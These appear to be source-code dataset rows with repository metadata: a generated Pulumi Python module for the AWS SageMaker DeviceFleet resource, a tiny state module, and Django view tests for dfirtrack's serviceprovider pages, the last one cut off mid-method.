] | null | null | null | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeviceFleetArgs', 'DeviceFleet']
@pulumi.input_type
class DeviceFleetArgs:
def __init__(__self__, *,
device_fleet_name: pulumi.Input[str],
output_config: pulumi.Input['DeviceFleetOutputConfigArgs'],
role_arn: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a DeviceFleet resource.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input['DeviceFleetOutputConfigArgs'] output_config: Specifies details about the repository. see Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
pulumi.set(__self__, "device_fleet_name", device_fleet_name)
pulumi.set(__self__, "output_config", output_config)
pulumi.set(__self__, "role_arn", role_arn)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_iot_role_alias is not None:
pulumi.set(__self__, "enable_iot_role_alias", enable_iot_role_alias)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> pulumi.Input[str]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@device_fleet_name.setter
def device_fleet_name(self, value: pulumi.Input[str]):
pulumi.set(self, "device_fleet_name", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Input['DeviceFleetOutputConfigArgs']:
"""
Specifies details about the repository. see Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: pulumi.Input['DeviceFleetOutputConfigArgs']):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Input[str]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@enable_iot_role_alias.setter
def enable_iot_role_alias(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_iot_role_alias", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _DeviceFleetState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
iot_role_alias: Optional[pulumi.Input[str]] = None,
output_config: Optional[pulumi.Input['DeviceFleetOutputConfigArgs']] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering DeviceFleet resources.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input['DeviceFleetOutputConfigArgs'] output_config: Specifies details about the repository. see Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if description is not None:
pulumi.set(__self__, "description", description)
if device_fleet_name is not None:
pulumi.set(__self__, "device_fleet_name", device_fleet_name)
if enable_iot_role_alias is not None:
pulumi.set(__self__, "enable_iot_role_alias", enable_iot_role_alias)
if iot_role_alias is not None:
pulumi.set(__self__, "iot_role_alias", iot_role_alias)
if output_config is not None:
pulumi.set(__self__, "output_config", output_config)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@device_fleet_name.setter
def device_fleet_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_fleet_name", value)
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@enable_iot_role_alias.setter
def enable_iot_role_alias(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_iot_role_alias", value)
@property
@pulumi.getter(name="iotRoleAlias")
def iot_role_alias(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "iot_role_alias")
@iot_role_alias.setter
def iot_role_alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iot_role_alias", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> Optional[pulumi.Input['DeviceFleetOutputConfigArgs']]:
"""
Specifies details about the repository. see Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: Optional[pulumi.Input['DeviceFleetOutputConfigArgs']]):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
class DeviceFleet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Sagemaker Device Fleet resource.
## Example Usage
### Basic usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.DeviceFleet("example",
device_fleet_name="example",
role_arn=aws_iam_role["test"]["arn"],
output_config=aws.sagemaker.DeviceFleetOutputConfigArgs(
s3_output_location=f"s3://{aws_s3_bucket['example']['bucket']}/prefix/",
))
```
## Import
Sagemaker Device Fleets can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:sagemaker/deviceFleet:DeviceFleet example my-fleet
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']] output_config: Specifies details about the repository. see Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeviceFleetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Sagemaker Device Fleet resource.
## Example Usage
### Basic usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.DeviceFleet("example",
device_fleet_name="example",
role_arn=aws_iam_role["test"]["arn"],
output_config=aws.sagemaker.DeviceFleetOutputConfigArgs(
s3_output_location=f"s3://{aws_s3_bucket['example']['bucket']}/prefix/",
))
```
## Import
Sagemaker Device Fleets can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:sagemaker/deviceFleet:DeviceFleet example my-fleet
```
:param str resource_name: The name of the resource.
:param DeviceFleetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeviceFleetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeviceFleetArgs.__new__(DeviceFleetArgs)
__props__.__dict__["description"] = description
if device_fleet_name is None and not opts.urn:
raise TypeError("Missing required property 'device_fleet_name'")
__props__.__dict__["device_fleet_name"] = device_fleet_name
__props__.__dict__["enable_iot_role_alias"] = enable_iot_role_alias
if output_config is None and not opts.urn:
raise TypeError("Missing required property 'output_config'")
__props__.__dict__["output_config"] = output_config
if role_arn is None and not opts.urn:
raise TypeError("Missing required property 'role_arn'")
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["arn"] = None
__props__.__dict__["iot_role_alias"] = None
__props__.__dict__["tags_all"] = None
super(DeviceFleet, __self__).__init__(
'aws:sagemaker/deviceFleet:DeviceFleet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
iot_role_alias: Optional[pulumi.Input[str]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'DeviceFleet':
"""
Get an existing DeviceFleet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']] output_config: Specifies details about the repository. see Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeviceFleetState.__new__(_DeviceFleetState)
__props__.__dict__["arn"] = arn
__props__.__dict__["description"] = description
__props__.__dict__["device_fleet_name"] = device_fleet_name
__props__.__dict__["enable_iot_role_alias"] = enable_iot_role_alias
__props__.__dict__["iot_role_alias"] = iot_role_alias
__props__.__dict__["output_config"] = output_config
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
return DeviceFleet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> pulumi.Output[str]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@property
@pulumi.getter(name="iotRoleAlias")
def iot_role_alias(self) -> pulumi.Output[str]:
return pulumi.get(self, "iot_role_alias")
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Output['outputs.DeviceFleetOutputConfig']:
"""
Specifies details about the repository. see Output Config details below.
"""
return pulumi.get(self, "output_config")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
| 46.490196 | 257 | 0.660607 | 2,885 | 23,710 | 5.203466 | 0.071057 | 0.085731 | 0.065281 | 0.03717 | 0.869105 | 0.853451 | 0.834932 | 0.811884 | 0.794431 | 0.777112 | 0 | 0.000387 | 0.237284 | 23,710 | 509 | 258 | 46.581532 | 0.829739 | 0.351877 | 0 | 0.644599 | 1 | 0 | 0.115493 | 0.035276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160279 | false | 0.003484 | 0.02439 | 0.006969 | 0.28223 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f71b2b58505f1a73cc43c49801a8cae13c3f8a26 | 43 | py | Python | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | 1 | 2018-04-02T15:38:10.000Z | 2018-04-02T15:38:10.000Z | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | null | null | null | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | 1 | 2021-09-04T12:37:34.000Z | 2021-09-04T12:37:34.000Z | import state
def change():
state.x = 2 | 10.75 | 15 | 0.627907 | 7 | 43 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.255814 | 43 | 4 | 15 | 10.75 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e393a2cbcb35bcfb29216dbbcea5e479a3f5c9b2 | 18,127 | py | Python | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | import urllib.parse
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Serviceprovider
class ServiceproviderViewTestCase(TestCase):
""" serviceprovider view tests """
@classmethod
def setUpTestData(cls):
# create object
Serviceprovider.objects.create(serviceprovider_name='serviceprovider_1')
# create user
User.objects.create_user(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
def test_serviceprovider_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/', safe='')
# get response
response = self.client.get('/serviceprovider/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_list_logged_in(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_list_template(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/serviceprovider/serviceprovider_list.html')
def test_serviceprovider_list_get_user_context(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_list_redirect(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/', safe='/')
# get response
response = self.client.get('/serviceprovider', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_detail_not_logged_in(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', safe='')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_detail_logged_in(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_detail_template(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/serviceprovider/serviceprovider_detail.html')
def test_serviceprovider_detail_get_user_context(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_detail_redirect(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', safe='/')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/add/', safe='')
# get response
response = self.client.get('/serviceprovider/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_logged_in(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
def test_serviceprovider_add_get_user_context(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_add_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/add/', safe='/')
# get response
response = self.client.get('/serviceprovider/add', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_add_post_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {
'serviceprovider_name': 'serviceprovider_add_post_test',
}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# get object
serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name = 'serviceprovider_add_post_test').serviceprovider_id
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_id) + '/', safe='/')
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_post_invalid_reload(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_post_invalid_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
def test_serviceprovider_add_popup_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/add_popup/', safe='')
# get response
response = self.client.get('/serviceprovider/add_popup/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_popup_logged_in(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_popup_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form_popup.html')
def test_serviceprovider_add_popup_get_user_context(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_add_popup_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/add_popup/', safe='/')
# get response
response = self.client.get('/serviceprovider/add_popup', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_add_popup_post_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {
'serviceprovider_name': 'serviceprovider_add_popup_post_test',
}
# get response
response = self.client.post('/serviceprovider/add_popup/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_popup_post_invalid_reload(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add_popup/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_popup_post_invalid_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add_popup/', data_dict)
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form_popup.html')
def test_serviceprovider_edit_not_logged_in(self):
""" test edit view """
# get object
